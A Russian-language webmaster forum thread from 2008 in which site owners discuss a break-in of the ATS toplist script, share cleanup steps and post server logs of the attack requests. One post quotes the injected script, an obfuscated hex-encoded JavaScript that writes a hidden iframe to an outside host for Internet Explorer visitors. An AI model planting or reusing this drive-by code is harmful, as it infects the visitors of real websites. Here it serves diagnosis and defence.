С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
 Добавлено: 06/11/08 в 11:27 |
В общем, срочные меры такие: 1. Закрыть авторегистрацию трейдеров; 2. Поставить права 644 на темплейт и файлы установок; 3. Зашифровать пароль. На выходных выложу апдейт, который закроет дырку.
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 06/11/08 в 11:59 |
Ребят, а какую версию АТС ломали? Отпишите подробнее??
|
|
|
|
| |
С нами с 01.03.04
Сообщения: 682
Рейтинг: 640
|
| Добавлено: 06/11/08 в 12:06 |
1.6.3 у меня
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 06/11/08 в 12:15 |
Чорт... нада закрываться...
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 12:22 |
у меня 1.7.1
и еще может не в тему.. постоянно стали выскакивать сообщения при первом заходе в админку сиджа, при второй попытке все ок.
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 38
|
|
|
|
| |
С нами с 13.06.08
Сообщения: 39
Рейтинг: 61
|
| Добавлено: 06/11/08 в 12:36 |
У кого АТС со Стримом - проверьте шаблоны в ротаторе, там в конце код ифрейма!
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 06/11/08 в 13:02 |
| Gidz писал: | это оно? 
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script> |
У кого такая херня, значит бэкдором заразили сервер с помощью пхп-шеллов. Поможет только зачистка всего сервера. Надо делать поиск по содержимому с поиском 3C69667 и 202069662 и последующим удалением всего непотребного.
Кто не умеет сам, за небольшую плату помогу.
|
|
|
|
| |
С нами с 13.06.08
Сообщения: 39
Рейтинг: 61
|
| Добавлено: 06/11/08 в 13:14 |
(потёрто)
|
|
|
|
| |
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
| Добавлено: 06/11/08 в 13:46 |
блин, тоже такая хрень ((
причем капча у меня была включена и трейдеров никаких не добавлялось....
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 06/11/08 в 14:38 |
слёзно прошу - дайте аксеслоги апача(нгинкса) поломанных доменов, 99.999% что ломают скрипт через фейкового реферера или query_string, это лечится банальным хтаксесом.
|
|
|
|
| |
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
| Добавлено: 06/11/08 в 14:50 |
стукни в асю как появишся, скину логи
|
|
|
|
| |
беспартийный единоличник
С нами с 30.10.03
Сообщения: 5211
Рейтинг: 1117
|
| Добавлено: 06/11/08 в 15:13 |
Вопрос по темплейту, от тех кто ещё не зацепил, но сохраняет бдительность. Имеется ввиду темплейт топлиста?
|
|
|
|
Не говорите людям, что вы о них думаете. Говорите им приятное.
|
4
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 06/11/08 в 15:17 |
Оффтопик: Ну вот и до АТС добрались хацкеры поганые 
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 06/11/08 в 15:21 |
| Parker писал: | | Вопрос по темплейту, от тех кто ещё не зацепил, но сохраняет бдительность. Имеется ввиду темплейт топлиста? |
Я так понял, что именно про темплэйт топ-листа речь...
P.S. Нада уже похоже на платные скрипты переходить...
|
|
|
|
| |
С нами с 13.06.08
Сообщения: 39
Рейтинг: 61
|
| Добавлено: 06/11/08 в 15:29 |
to Project
А платные не ломают ?
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 06/11/08 в 15:32 |
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 06/11/08 в 15:42 |
| AdBizWork писал: | to Project
А платные не ломают ? |
Из-за меньше популярности вряд ли скоро начнут ломать...
|
|
|
|
| |
беспартийный единоличник
С нами с 30.10.03
Сообщения: 5211
Рейтинг: 1117
|
| Добавлено: 06/11/08 в 15:42 |
То есть, вредоносный php скрипт - это улрл трейдера который после добаления в топлист делает бяку? Прикольно.
|
|
|
|
Не говорите людям, что вы о них думаете. Говорите им приятное.
|
3
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 06/11/08 в 15:44 |
не совсем урл трейдера вроде... как то хитро добавляется... возможно как аська.... пока еще не разобрался. понятно только что при заходе в админку он дергается и заражается сервер.
а может у всех разными способами добавлялся, не знаю ) пока вот один способ только наблюдаю
|
|
|
|
| |
С нами с 22.12.07
Сообщения: 2481
Рейтинг: 1710
|
| Добавлено: 06/11/08 в 15:47 |
ага у меня ломанули 1.7.1 нашел в трейд рулезах.
|
|
|
|
| |
беспартийный единоличник
С нами с 30.10.03
Сообщения: 5211
Рейтинг: 1117
|
| Добавлено: 06/11/08 в 15:50 |
| Цитата: | | добавляет гадость во все shtml файлы какие найдет |
В общем ответ на мой вопрос найден.
Одним топлистом дело не обходится.
|
|
|
|
Не говорите людям, что вы о них думаете. Говорите им приятное.
|
3
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 06/11/08 в 16:01 |
с разработчиками ATS пытался связаться - что то молчат.
То ли не интересно, то ли нет никого )
|
|
|
|
| |
С нами с 22.12.07
Сообщения: 2481
Рейтинг: 1710
|
| Добавлено: 06/11/08 в 16:02 |
не знаю как у кого но у меня с поломанного сиджа лезло в комп вот это
C:\\windows\system32\bratsk.exe хм ща буду копаться в темпе где эта дрянь сидит
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 06/11/08 в 16:16 |
Расколупайте джаву, определите куда сливается ваш трафик и кидайте арбузы, снесут домен считай их работа в жопу
ЗЫ
закрыто полностью по ипу и поставлена заплата
ниче не сломано
тьфу 3 раза
|
|
|
|
| |
С нами с 04.09.03
Сообщения: 439
Рейтинг: 410
|
| Добавлено: 06/11/08 в 16:40 |
у меня взломали сервер через форму добавления в версии 1.6.3
логи такого плана
ip- - [04/Nov/2008:15:53:12 +0000] "POST /admin.php?&s=settings&pg=tr HTTP/1.0" 200 18997 "http://79.135.187.18/ats/ats.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
ip - - [04/Nov/2008:15:53:47 +0000] "POST /admin.php?&s=settings&pg=tr HTTP/1.0" 200 18997 "http://79.135.187.18/ats/ats.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
ip - - [04/Nov/2008:15:54:07 +0000] "POST /admin.php?&s=settings&pg=tr HTTP/1.0" 200 18997 "http://79.135.187.18/ats/ats.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
ip - - [04/Nov/2008:15:59:00 +0000] "POST /admin.php?&s=settings&pg=tr HTTP/1.0" 200 18997 "http://79.135.187.18/ats/ats.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
с этим рефером http://79.135.187.18/ats/ats.php вы заходили в админку
у меня 870 файлов было заражено
|
|
|
|
| |
